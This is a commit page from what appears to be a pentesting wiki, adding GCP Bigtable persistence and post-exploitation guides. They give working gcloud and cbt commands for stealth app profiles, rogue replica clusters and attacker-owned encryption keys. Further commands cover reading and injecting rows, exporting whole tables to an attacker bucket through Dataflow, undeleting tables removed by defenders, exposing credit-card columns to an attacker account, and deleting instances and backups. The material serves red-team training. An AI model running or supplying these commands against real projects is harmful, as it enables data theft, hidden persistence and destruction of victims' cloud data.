Skip to content

Commit d25a46d

Browse files
committed
bigtable
1 parent 7c16632 commit d25a46d

File tree

4 files changed

+537
-2
lines changed

4 files changed

+537
-2
lines changed
Lines changed: 58 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,58 @@
1+
# GCP - Bigtable Persistence
2+
3+
{{#include ../../../banners/hacktricks-training.md}}
4+
5+
## Bigtable
6+
7+
For more information about Bigtable check:
8+
9+
{{#ref}}
10+
../gcp-services/gcp-bigtable-enum.md
11+
{{#endref}}
12+
13+
### Dedicated attacker App Profile
14+
15+
**Permissions:** `bigtable.appProfiles.create`, `bigtable.appProfiles.update`.
16+
17+
Create an app profile that routes traffic to your replica cluster and enable Data Boost so you never depend on provisioned nodes that defenders might notice.
18+
19+
```bash
20+
gcloud bigtable app-profiles create stealth-profile \
21+
--instance=<instance-id> --route-any --restrict-to=<attacker-cluster> \
22+
--row-affinity --description="internal batch"
23+
24+
gcloud bigtable app-profiles update stealth-profile \
25+
--instance=<instance-id> --data-boost \
26+
--data-boost-compute-billing-owner=HOST_PAYS
27+
```
28+
29+
As long as this profile exists you can reconnect using fresh credentials that reference it.
30+
31+
### Maintain your own replica cluster
32+
33+
**Permissions:** `bigtable.clusters.create`, `bigtable.instances.update`, `bigtable.clusters.list`.
34+
35+
Provision a minimal node-count cluster in a quiet region. Even if your client identities disappear, **the cluster keeps a full copy of every table** until defenders explicitly remove it.
36+
37+
```bash
38+
gcloud bigtable clusters create dark-clone \
39+
--instance=<instance-id> --zone=us-west4-b --num-nodes=1
40+
```
41+
42+
Keep an eye on it through `gcloud bigtable clusters describe dark-clone --instance=<instance-id>` so you can scale up instantly when you need to pull data.
43+
44+
### Lock replication behind your own CMEK
45+
46+
**Permissions:** `bigtable.clusters.create`, `cloudkms.cryptoKeyVersions.useToEncrypt` on the attacker-owned key.
47+
48+
Bring your own KMS key when spinning up a clone. Without that key, Google cannot re-create or fail over the cluster, so blue teams must coordinate with you before touching it.
49+
50+
```bash
51+
gcloud bigtable clusters create cmek-clone \
52+
--instance=<instance-id> --zone=us-east4-b --num-nodes=1 \
53+
--kms-key=projects/<attacker-proj>/locations/<kms-location>/keyRings/<ring>/cryptoKeys/<key>
54+
```
55+
56+
Rotate or disable the key in your project to instantly brick the replica (while still letting you turn it back on later).
57+
58+
{{#include ../../../banners/hacktricks-training.md}}
Lines changed: 271 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,271 @@
1+
# GCP - Bigtable Post Exploitation
2+
3+
{{#include ../../../banners/hacktricks-training.md}}
4+
5+
## Bigtable
6+
7+
For more information about Bigtable check:
8+
9+
{{#ref}}
10+
../gcp-services/gcp-bigtable-enum.md
11+
{{#endref}}
12+
13+
> [!TIP]
14+
> Install the `cbt` CLI once via the Cloud SDK so the commands below work locally:
15+
>
16+
> ```bash
17+
> gcloud components install cbt
18+
> ```
19+
20+
### Read rows
21+
22+
**Permissions:** `bigtable.tables.readRows`
23+
24+
`cbt` ships with the Cloud SDK and talks to the admin/data APIs without needing any middleware. Point it at the compromised project/instance and dump rows straight from the table. Limit the scan if you only need a peek.
25+
26+
```bash
27+
# Install cbt
28+
gcloud components update
29+
gcloud components install cbt
30+
31+
# Read entries with creds of gcloud
32+
cbt -project=<victim-proj> -instance=<instance-id> read <table-id>
33+
```
34+
35+
### Write rows
36+
37+
**Permissions:** `bigtable.tables.mutateRows`, (you will need `bigtable.tables.readRows` to confirm the change).
38+
39+
Use the same tool to upsert arbitrary cells. This is the quickest way to backdoor configs, drop web shells, or plant poisoned dataset rows.
40+
41+
```bash
42+
# Inject a new row
43+
cbt -project=<victim-proj> -instance=<instance-id> set <table> <row-key> <family>:<column>=<value>
44+
45+
cbt -project=<victim-proj> -instance=<instance-id> set <table-id> user#1337 profile:name="Mallory" profile:role="admin" secrets:api_key=@/tmp/stealme.bin
46+
47+
# Verify the injected row
48+
cbt -project=<victim-proj> -instance=<instance-id> read <table-id> rows=user#1337
49+
```
50+
51+
`cbt set` accepts raw bytes via the `@/path` syntax, so you can push compiled payloads or serialized protobufs exactly as downstream services expect them.
52+
53+
### Dump rows to your bucket
54+
55+
**Permissions:** `dataflow.jobs.create`, `resourcemanager.projects.get`, `iam.serviceAccounts.actAs`
56+
57+
It's possible to exfiltrate the contents of an entire table to a bucket controlled by the attacker by launching a Dataflow job that streams rows into a GCS bucket you control.
58+
59+
> [!NOTE]
60+
> Note that you will need the permission `iam.serviceAccounts.actAs` over a some SA with enough permissions to perform the export (by default, if not aindicated otherwise, the default compute SA will be used).
61+
62+
```bash
63+
gcloud dataflow jobs run <job-name> \
64+
--gcs-location=gs://dataflow-templates-us-<REGION>/<VERSION>/Cloud_Bigtable_to_GCS_Json \
65+
--project=<PROJECT> \
66+
--region=<REGION> \
67+
--parameters=<PROJECT>,bigtableInstanceId=<INSTANCE_ID>,bigtableTableId=<TABLE_ID>,filenamePrefix=<PREFIX>,outputDirectory=gs://<BUCKET>/raw-json/ \
68+
--staging-location=gs://<BUCKET>/staging/
69+
70+
# Example
71+
gcloud dataflow jobs run dump-bigtable3 \
72+
--gcs-location=gs://dataflow-templates-us-central1/latest/Cloud_Bigtable_to_GCS_Json \
73+
--project=gcp-labs-3uis1xlx \
74+
--region=us-central1 \
75+
--parameters=bigtableProjectId=gcp-labs-3uis1xlx,bigtableInstanceId=avesc-20251118172913,bigtableTableId=prod-orders,filenamePrefix=prefx,outputDirectory=gs://deleteme20u9843rhfioue/raw-json/ \
76+
--staging-location=gs://deleteme20u9843rhfioue/staging/
77+
```
78+
79+
> [!NOTE]
80+
> Switch the template to `Cloud_Bigtable_to_GCS_Parquet` or `Cloud_Bigtable_to_GCS_SequenceFile` if you want Parquet/SequenceFile outputs instead of JSON. The permissions are the same; only the template path changes.
81+
82+
### Import rows
83+
84+
**Permissions:** `dataflow.jobs.create`, `resourcemanager.projects.get`, `iam.serviceAccounts.actAs`
85+
86+
It's possible to import the contents of an entire table from a bucket controlled by the attacker by launching a Dataflow job that streams rows into a GCS bucket you control. For this the attacker will first need to create a parquet file with the data to be imported with the expected schema. An attacker could first export the data in parquet format following the previous technique with the setting `Cloud_Bigtable_to_GCS_Parquet` and add new entries into the downloaded parquet file
87+
88+
89+
90+
> [!NOTE]
91+
> Note that you will need the permission `iam.serviceAccounts.actAs` over a some SA with enough permissions to perform the export (by default, if not aindicated otherwise, the default compute SA will be used).
92+
93+
```bash
94+
gcloud dataflow jobs run import-bt-$(date +%s) \
95+
--region=<REGION> \
96+
--gcs-location=gs://dataflow-templates-<REGION>/<VERSION>>/GCS_Parquet_to_Cloud_Bigtable \
97+
--project=<PROJECT> \
98+
--parameters=bigtableProjectId=<PROJECT>,bigtableInstanceId=<INSTANCE-ID>,bigtableTableId=<TABLE-ID>,inputFilePattern=gs://<BUCKET>/import/bigtable_import.parquet \
99+
--staging-location=gs://<BUCKET>/staging/
100+
101+
# Example
102+
gcloud dataflow jobs run import-bt-$(date +%s) \
103+
--region=us-central1 \
104+
--gcs-location=gs://dataflow-templates-us-central1/latest/GCS_Parquet_to_Cloud_Bigtable \
105+
--project=gcp-labs-3uis1xlx \
106+
--parameters=bigtableProjectId=gcp-labs-3uis1xlx,bigtableInstanceId=avesc-20251118172913,bigtableTableId=prod-orders,inputFilePattern=gs://deleteme20u9843rhfioue/import/parquet_prefx-00000-of-00001.parquet \
107+
--staging-location=gs://deleteme20u9843rhfioue/staging/
108+
```
109+
110+
### Restoring backups
111+
112+
**Permissions:** `bigtable.backups.restore`, `bigtable.tables.create`.
113+
114+
An attacker with these permissions can restore a bakcup into a new table under his control in order to be able to recover old sensitive data.
115+
116+
```bash
117+
gcloud bigtable backups list --instance=<INSTANCE_ID_SOURCE> \
118+
--cluster=<CLUSTER_ID_SOURCE>
119+
120+
gcloud bigtable instances tables restore \
121+
--source=projects/<PROJECT_ID_SOURCE>/instances/<INSTANCE_ID_SOURCE>/clusters/<CLUSTER_ID>/backups/<BACKUP_ID> \
122+
--async \
123+
--destination=<TABLE_ID_NEW> \
124+
--destination-instance=<INSTANCE_ID_DESTINATION> \
125+
--project=<PROJECT_ID_DESTINATION>
126+
```
127+
128+
### Undelete tables
129+
130+
**Permissions:** `bigtable.tables.undelete`
131+
132+
Bigtable supports soft-deletion with a grace period (typically 7 days by default). During this window, an attacker with the `bigtable.tables.undelete` permission can restore a recently deleted table and recover all its data, potentially accessing sensitive information that was thought to be destroyed.
133+
134+
This is particularly useful for:
135+
- Recovering data from tables deleted by defenders during incident response
136+
- Accessing historical data that was intentionally purged
137+
- Reversing accidental or malicious deletions to maintain persistence
138+
139+
```bash
140+
# List recently deleted tables (requires bigtable.tables.list)
141+
gcloud bigtable instances tables list --instance=<instance-id> \
142+
--show-deleted
143+
144+
# Undelete a table within the retention period
145+
gcloud bigtable instances tables undelete <table-id> \
146+
--instance=<instance-id>
147+
```
148+
149+
> [!NOTE]
150+
> The undelete operation only works within the configured retention period (default 7 days). After this window expires, the table and its data are permanently deleted and cannot be recovered through this method.
151+
152+
153+
### Create Authorized Views
154+
155+
**Permissions:** `bigtable.authorizedViews.create`, `bigtable.tables.readRows`, `bigtable.tables.mutateRows`
156+
157+
Authorized views let you present a curated subset of the table. Instead of respecting least privilege, use them to publish **exactly the sensitive column/row sets** you care about and whitelist your own principal.
158+
159+
> [!WARNING]
160+
> The thing is that to create an authorized view you also need to be able to read and mutate rows in the base table, therefore you are not obtaiing any extra permission, therefore this technique is mostly useless.
161+
162+
```bash
163+
cat <<'EOF' > /tmp/credit-cards.json
164+
{
165+
"subsetView": {
166+
"rowPrefixes": ["acct#"],
167+
"familySubsets": {
168+
"pii": {
169+
"qualifiers": ["cc_number", "cc_cvv"]
170+
}
171+
}
172+
}
173+
}
174+
EOF
175+
176+
gcloud bigtable authorized-views create card-dump \
177+
--instance=<instance-id> --table=<table-id> \
178+
--definition-file=/tmp/credit-cards.json
179+
180+
gcloud bigtable authorized-views add-iam-policy-binding card-dump \
181+
--instance=<instance-id> --table=<table-id> \
182+
--member='user:<attacker@example.com>' --role='roles/bigtable.reader'
183+
```
184+
185+
Because access is scoped to the view, defenders often overlook the fact that you just created a new high-sensitivity endpoint.
186+
187+
### Read Authorized Views
188+
189+
**Permissions:** `bigtable.authorizedViews.readRows`
190+
191+
If you have access to an Authorized View, you can read data from it using the Bigtable client libraries by specifying the authorized view name in your read requests. Note that the authorized view will be probalby limiting what you can access from the table. Below is an example using Python:
192+
193+
194+
```python
195+
from google.cloud import bigtable
196+
from google.cloud.bigtable_v2 import BigtableClient as DataClient
197+
from google.cloud.bigtable_v2 import ReadRowsRequest
198+
199+
# Set your project, instance, table, view id
200+
PROJECT_ID = "gcp-labs-3uis1xlx"
201+
INSTANCE_ID = "avesc-20251118172913"
202+
TABLE_ID = "prod-orders"
203+
AUTHORIZED_VIEW_ID = "auth_view"
204+
205+
client = bigtable.Client(project=PROJECT_ID, admin=True)
206+
instance = client.instance(INSTANCE_ID)
207+
table = instance.table(TABLE_ID)
208+
209+
data_client = DataClient()
210+
authorized_view_name = f"projects/{PROJECT_ID}/instances/{INSTANCE_ID}/tables/{TABLE_ID}/authorizedViews/{AUTHORIZED_VIEW_ID}"
211+
212+
request = ReadRowsRequest(
213+
authorized_view_name=authorized_view_name
214+
)
215+
216+
rows = data_client.read_rows(request=request)
217+
for response in rows:
218+
for chunk in response.chunks:
219+
if chunk.row_key:
220+
row_key = chunk.row_key.decode('utf-8') if isinstance(chunk.row_key, bytes) else chunk.row_key
221+
print(f"Row: {row_key}")
222+
if chunk.family_name:
223+
family = chunk.family_name.value if hasattr(chunk.family_name, 'value') else chunk.family_name
224+
qualifier = chunk.qualifier.value.decode('utf-8') if hasattr(chunk.qualifier, 'value') else chunk.qualifier.decode('utf-8')
225+
value = chunk.value.decode('utf-8') if isinstance(chunk.value, bytes) else str(chunk.value)
226+
print(f" {family}:{qualifier} = {value}")
227+
```
228+
229+
### Denial of Service via Delete Operations
230+
231+
**Permissions:** `bigtable.appProfiles.delete`, `bigtable.authorizedViews.delete`, `bigtable.authorizedViews.deleteTagBinding`, `bigtable.backups.delete`, `bigtable.clusters.delete`, `bigtable.instances.delete`, `bigtable.tables.delete`
232+
233+
Any of the Bigtable delete permissions can be weaponized for denial of service attacks. An attacker with these permissions can disrupt operations by deleting critical Bigtable resources:
234+
235+
- **`bigtable.appProfiles.delete`**: Delete application profiles, breaking client connections and routing configurations
236+
- **`bigtable.authorizedViews.delete`**: Remove authorized views, cutting off legitimate access paths for applications
237+
- **`bigtable.authorizedViews.deleteTagBinding`**: Remove tag bindings from authorized views
238+
- **`bigtable.backups.delete`**: Destroy backup snapshots, eliminating disaster recovery options
239+
- **`bigtable.clusters.delete`**: Delete entire clusters, causing immediate data unavailability
240+
- **`bigtable.instances.delete`**: Remove complete Bigtable instances, wiping out all tables and configurations
241+
- **`bigtable.tables.delete`**: Delete individual tables, causing data loss and application failures
242+
243+
```bash
244+
# Delete a table
245+
gcloud bigtable instances tables delete <table-id> \
246+
--instance=<instance-id>
247+
248+
# Delete an authorized view
249+
gcloud bigtable authorized-views delete <view-id> \
250+
--instance=<instance-id> --table=<table-id>
251+
252+
# Delete a backup
253+
gcloud bigtable backups delete <backup-id> \
254+
--instance=<instance-id> --cluster=<cluster-id>
255+
256+
# Delete an app profile
257+
gcloud bigtable app-profiles delete <profile-id> \
258+
--instance=<instance-id>
259+
260+
# Delete a cluster
261+
gcloud bigtable clusters delete <cluster-id> \
262+
--instance=<instance-id>
263+
264+
# Delete an entire instance
265+
gcloud bigtable instances delete <instance-id>
266+
```
267+
268+
> [!WARNING]
269+
> Deletion operations are often immediate and irreversible. Ensure backups exist before testing these commands, as they can cause permanent data loss and severe service disruption.
270+
271+
{{#include ../../../banners/hacktricks-training.md}}

0 commit comments

Comments
 (0)